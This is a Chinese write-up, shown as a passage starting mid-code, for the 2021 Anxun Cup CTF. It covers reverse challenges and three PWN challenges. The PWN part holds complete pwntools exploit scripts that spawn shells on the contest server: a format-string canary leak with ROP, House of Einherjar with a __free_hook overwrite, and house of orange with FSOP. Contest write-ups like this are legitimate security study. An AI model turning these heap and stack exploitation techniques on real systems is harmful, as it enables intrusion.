0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8, 0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0, 0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84, 0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48}; unsigned int AROL(unsigned i,unsigned bit){ _asm{ mov eax,[ebp+8]; push ecx; mov ecx,[ebp+0xC]; rol eax,cl; pop ecx; leave; retn; } return -1; } int __cdecl Rcopy(unsigned int a1, char * a2) { int result; // eax int i; // [esp+4Ch] [ebp-4h]for ( i = 0; i < 4; ++i ) { a2[i] = a1 >> (24 - 8 * i); result = i + 1; } return result; } void __cdecl rev(int a1, char *a2){ a2[0]=(a1&0xFF000000)>>24; a2[1]=(a1&0xFF0000)>>16; a2[2]=(a1&0xFF00)>>8; a2[3]=a1&0xFF; } unsigned int EP(unsigned int a1){ int v6=0; Rcopy(a1,(char*)&v6); for(int i=0; i<4; ++i){ unsigned int p=*((unsigned char*)&v6+i); *((char*)&v6+i)=map[p]; } rev(v6,(char*)&a1); return a1^AROL(a1,2)^AROL(a1,10)^AROL(a1,18)^AROL(a1,24); } int main(int argc, char* argv[]) { int a=0; unsigned int b=0x12345678; b=EP(b); unsigned int aim[36]={0}; aim[35]=0xE7A35E0F; aim[34]=0xFC93FC76; aim[33]=0x6CFB29E0; aim[32]=0x162FA567; int i=0; for( i=31; i>=0; i--){ aim[i]=EP(key[i + 4] ^ aim[i + 3] ^ aim[i + 2] ^ aim[i + 1])^aim[i+4]; } for(i=0; i<4; i++){ rev(aim[i],(char*)&aim[i]); } char* t=(char*)aim; for ( i = 0; i < 32; i += 2 )t[i] ^= 6u; for ( i = 1; i < 32; i += 2 )t[i] ^= 7u; getchar(); return 0; }

mazeee
首先根据提示,可以看到base编码,动态调试发现base表被替换,直接换表base解码
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

得到,D0g3{Y0u^Can=So1ve_it!
然后继续分析迷宫,很容易看出来这是一个三维迷宫,并且可以算出步数应该为22
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

脚本如下:
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

跑出来是:dWWwwdddWWaawwddsssSaw
输入后,告诉我这个。。。。,字符串又说我前面有点问题,what?
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

既然都提醒了是前面,那大概率是下图这段了,不然出题人就疯了
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

411D80应该是420000数组的初始化函数,然而,420000数组内已经有东西了,并不是我们想的000000000(全局变量是这样的),说明题意大概就是根据420000内的数据,算出42024C的数据,1F和E0这两个数很特殊,看懂了吗,一个取高3位,一个取低5位
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

算法就如下吧,不过多阐述了,直接看代码
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

sign in
有部分smc,直接用ODdump出来
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

发现就是算法段
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

先是一个xor操作
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

进行置换操作,打乱字符顺序,并保存
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

先加密,然后结果去比较
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

有点像tea算法
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

V5我们不得而知,但是我们可以知道的是42CA44小于256,所以可以爆破
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

脚本如下
CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

PWN ez_stack
from pwn import*context.log_level = "debug"#io = process("./ezstack") io = remote("47.108.195.119","20113")def enter(): io.recv() io.sendline("Light1ng") io.recv() io.sendline("wwsbb!")enter() io.sendline("%11$p%17$pa") io.recvuntil("0x") canary = int(io.recv(16),16) io.recvuntil("0x") main = int(io.recv(12),16) pie = main - 0x9dc ret = pie + 0x7c1 sh_addr = pie + 0xB24 system_plt = pie + 0x810 pop_rdi_ret = pie + 0xb03 success("canary:"+hex(canary)) success("pie:"+hex(pie))payload =p64(0)*3 + p64(canary) + p64(0xdeadbeef) + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_plt)io.recvline() io.sendline(payload) io.interactive()

CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup
文章图片

如图 main_offset 为0xb + 6
canary_offset 为 0x5 + 6
第一发payload 通过泄露main地址得到程序基地址 和 canary
第二发payload 直接ret2libc shell
noleak
libc2.7 漏洞点为edit时的off by null
因为无size限制 直接先申请大chunk 然后释放进unsorted bin
然后在申请该unsortedbin的一部分 直接show得到libc
然后就是House Of Einherjar 需要注意填满tcache即可。
from pwn import*context.log_level = "debug"io = remote("47.108.195.119","20182") #io = process("./pwn")def menu(choice): io.sendlineafter("4) delete a chunk",str(choice))def add(index,size): menu(1) io.sendlineafter("Index?",str(index)) io.sendlineafter("Size?",str(size))def delete(index): menu(4) io.sendlineafter("Index?",str(index))def show(index): menu(2) io.sendlineafter("Index?",str(index))def edit(index,content): menu(3) io.sendlineafter("Index?",str(index)) io.sendlineafter("content:",content)def look(): global io gdb.attach(io)def enter(): io.recv() io.sendline("Light1ng") io.recv() io.sendline("wwsbb!")def secret(): enter() io.sendlineafter("please input a str:","N0_py_1n_tHe_ct7")def look(): global io gdb.attach(io)#leak_libc secret() add(0,0x420) add(1,0x18) delete(0) add(0,0x18) show(0) io.recvuntil("\n") info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) libc = ELF("./libc.so.6",checksec = 0) malloc_hook = info - 1104 - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook"] free_hook = libc_base + libc.sym["__free_hook"] system = libc_base + libc.sym["system"] add(0,0x400)# add(0,0xf8) add(1,0x18) add(2,0xf8) for i in range(3,10): add(i,0xf8) for i in range(3,10): delete(i)# delete(0) edit(1,p64(0)*2+p64(0x100+0x20)) delete(2)add(3,0xd0) add(4,0x18) add(5,0x18) add(6,0x18) delete(6) delete(1) edit(5,p64(free_hook))add(7,0x18) add(8,0x18) edit(7,"/bin/sh\x00") edit(8,p64(system)) delete(7) io.interactive()

ez_heap
跟HITCON——houseoforange几乎一模一样
都是不限制size 然后漏洞为堆块溢出 只有add edit show
参考博客 :
https://blog.csdn.net/A951860555/article/details/116425824?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link
【CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup】house of orange 泄露出libc 然后unsorted bin attack + FSOP attack
from pwn import*context.log_level = "debug"io = process("./pwn")#io = remote("47.108.195.119","20141")def menu(choice): io.sendlineafter("Your choice : ",str(choice))def add(size,content): menu(1) io.sendlineafter("it\n",str(size)) io.sendlineafter("?\n",content)def edit(size,content): menu(2) io.sendlineafter("it\n",str(size)) io.sendafter("name\n",content)def show(): menu(3)def look(): global io gdb.attach(io)def enter(): io.recv() io.sendline("Light1ng") io.recv() io.sendline("wwsbb!")#gdb.attach(p) #enter() add(0x10, "a") edit(0x20,p64(0)*3+p64(0xfc1))add(0x1000,"top_chunk to the unsorted_bin")#fuck the libc and heap through the largebin add(0x400,b"a"*8) show() libc = ELF("./libc.so.6",checksec = 0) libc_info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00")) main_arena = libc_info- 1514 malloc_hook = main_arena - 0x10 libc_base = malloc_hook - libc.sym["__malloc_hook"] io_list_all = libc_base+libc.sym["_IO_list_all"] system = libc_base+libc.sym["system"]edit(0x10,b"a"*0x10) show() io.recvuntil(b"a"*0x10) heap_info = u64(io.recvuntil("\n",drop = True).ljust(8,b"\x00")) heap_base = heap_info & 0xfffffffffffff000# unsorted_bin attack + FSOP pad = cyclic(0x400)fsop = b"/bin/sh\x00"+p64(0x61)+p64(0)+p64(io_list_all-0x10) fsop += p64(0)+p64(1) fsop = fsop.ljust(0xd8, b"\x00") vtable_addr = heap_base+0x530 fsop += p64(vtable_addr) fsop += p64(0)*3+p64(system) pad += fsop print(hex(system)) print(hex(io_list_all))edit(len(pad),pad) print(hex(heap_base))menu(1) io.sendlineafter("it\n",str(0x18))io.interactive()

    推荐阅读